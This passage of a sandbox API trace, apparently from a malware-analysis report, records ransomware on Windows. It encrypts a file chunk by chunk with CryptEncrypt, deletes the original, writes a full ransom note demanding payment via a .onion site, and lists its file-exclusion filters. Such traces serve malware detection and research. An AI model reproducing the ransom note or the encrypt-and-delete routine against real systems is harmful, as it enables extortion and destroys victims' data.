lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.301] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.301] GetLastError () returned 0x0 [0159.301] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.301] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.302] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.302] GetLastError () returned 0x0 [0159.302] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.302] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.302] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.302] GetLastError () returned 0x0 [0159.302] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.302] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.302] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.302] GetLastError () returned 0x0 [0159.302] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.302] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.302] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.302] GetLastError () returned 0x0 [0159.302] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.302] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.302] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.302] GetLastError () returned 0x0 [0159.302] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.302] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.302] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.302] GetLastError () returned 0x0 [0159.302] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.303] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.303] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.303] GetLastError () returned 0x0 [0159.303] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.303] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.303] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.303] GetLastError () returned 0x0 [0159.303] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.303] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.303] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.303] GetLastError () returned 0x0 [0159.303] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.303] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.303] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.303] GetLastError () returned 0x0 [0159.303] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.303] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.303] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.303] GetLastError () returned 0x0 [0159.303] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.303] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.303] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.303] GetLastError () returned 0x0 [0159.303] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.303] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.304] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.304] GetLastError () returned 0x0 [0159.304] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.304] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.304] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.304] GetLastError () returned 0x0 [0159.304] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.304] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.304] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.304] GetLastError () returned 0x0 [0159.304] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.304] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.304] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.304] GetLastError () returned 0x0 [0159.304] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.304] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.304] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.304] GetLastError () returned 0x0 [0159.304] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.304] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.304] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.304] GetLastError () returned 0x0 [0159.304] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.304] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.304] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.304] GetLastError () returned 0x0 [0159.304] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.305] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.305] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.305] GetLastError () returned 0x0 [0159.305] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.305] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.305] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.305] GetLastError () returned 0x0 [0159.305] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.305] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.305] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x110) returned 1 [0159.305] GetLastError () returned 0x0 [0159.305] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x110, lpOverlapped=0x0) returned 1 [0159.305] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x0, lpOverlapped=0x0) returned 1 [0159.305] WriteFile (in: hFile=0x588, lpBuffer=0x29012e8*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesWritten=0x2d7e15c*=0x0, lpOverlapped=0x0) returned 1 [0159.305] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\lv-lv\\tipresx.dll.mui")) returned 0x20 [0159.305] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV\\tipresx.dll.mui", dwFileAttributes=0x20) returned 0 [0159.306] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV\\tipresx.dll.mui") returned 1 [0159.306] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\lv-lv\\tipresx.dll.mui")) returned 0 [0159.306] wcscpy (in: _Dest=0x2d7dcb4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV\\tipresx.dll.mui" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV\\tipresx.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV\\tipresx.dll.mui" [0159.306] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV\\tipresx.dll.mui" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV") returned 1 [0159.306] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7debc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV\\.xXE195.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\lv-lv\\.xxe195.tmp")) returned 0xe195 [0159.307] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\lv-lv\\tipresx.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV\\.xXE195.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\lv-lv\\.xxe195.tmp"), dwFlags=0x1) returned 0 [0159.307] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV\\.xXE195.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\lv-lv\\.xxe195.tmp")) returned 1 [0159.307] CryptDestroyKey (hKey=0x9ad8b8) returned 1 [0159.307] wcslen (_String="OK") returned 0x2 [0159.307] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0159.307] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0159.307] CryptDestroyKey (hKey=0x9ad1b8) returned 1 [0159.307] CryptDestroyHash (hHash=0x9ad7f8) returned 1 [0159.307] CryptReleaseContext (hProv=0x8e2de0, dwFlags=0x0) returned 1 [0159.307] FindNextFileW (in: hFindFile=0x9ad6b8, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0 [0159.308] GetLastError () returned 0x12 [0159.308] FindClose (in: hFindFile=0x9ad6b8 | out: hFindFile=0x9ad6b8) returned 1 [0159.308] _wfopen (_FileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV\\Recovers your files.html" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\lv-lv\\recovers your files.html"), _Mode="w") returned 0x77ac1268 [0159.308] fputs (in: _Str=" Encrypted files!

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a

Encrypted files!

All your files are encrypted.Using AES256-bit encryption and RSA-2048-bit encryption.
Making it impossible to recover files without the correct private key.
If you are interested in getting is the key and recover your files
You should proceed with the following steps.

The only way to decrypt your files safely is to buy the Descrypt and Private Key software.

Any attempts to restore your files with the third-party software will be fatal for your files!

Important use Firefox or Chrome browser

To proceed with the purchase you must access one of the link below

If neither of the links is online for a long period of time, there is another way to open it, you should install the Tor Browser

If your personal page is not available for a long period there is another way to open your personal page - installation and use of Tor Browser:

  1. run your Internet browser (if you do not know what it is run the Internet Explorer);
  2. enter or copy the address https://www.torproject.org/download/download-easy.html.en into the address bar of your browser and press ENTER;
  3. wait for the site loading;
  4. on the site you will be offered to download Tor Browser; download and run it, follow the installation instructions, wait until the installation is completed;
  5. run Tor Browser;
  6. connect with the button 'Connect' (if you use the English version);
  7. a normal Internet browser window will be opened after the initialization;
  8. type or copy the address

    https://lylh3uqyzay3lhrd.onion

    in this browser address bar;
  9. press ENTER;
  10. the site should be loaded; if for some reason the site is not loading wait for a moment and try again.
If you have any problems during installation or use of Tor Browser, please, visit https://www.youtube.com and type request in the search bar 'Install Tor Browser Windows' and you will find a lot of training videos about Tor Browser installation and use.

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a
", _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0159.308] fclose (in: _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0159.309] wcslen (_String="Unfortunately crypted files: ") returned 0x1d [0159.309] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0159.309] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0159.309] wcslen (_String="Fortunately ignored files because of filters: ") returned 0x2e [0159.309] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0159.309] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0159.309] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO\\*", pszSpec="*.exe") returned 0 [0159.309] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO\\*", pszSpec="*.dll") returned 0 [0159.309] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO\\*", pszSpec="*.lnk") returned 0 [0159.309] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO\\*", pszSpec="*.bat") returned 0 [0159.309] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO\\*", pszSpec="*.ini") returned 0 [0159.309] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO\\*", pszSpec="*.msi") returned 0 [0159.309] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO\\*", pszSpec="*.scf") returned 0 [0159.309] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO\\*", pszSpec="*pagefile.sys*") returned 0 [0159.309] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO\\*", pszSpec="*NTUSER.DAT*") returned 0 [0159.309] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO\\*", pszSpec="*AppData*") returned 0 [0159.309] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO\\*", pszSpec="*\\winrar\\*") returned 0 [0159.309] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO\\*", pszSpec="*\\Internet Explorer\\*") returned 0 [0159.309] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO\\*", pszSpec="*\\java\\*") returned 0 [0159.309] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO\\*", pszSpec="*\\TeamViewer\\*") returned 0 [0159.309] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO\\*", pszSpec="*\\windows\\*") returned 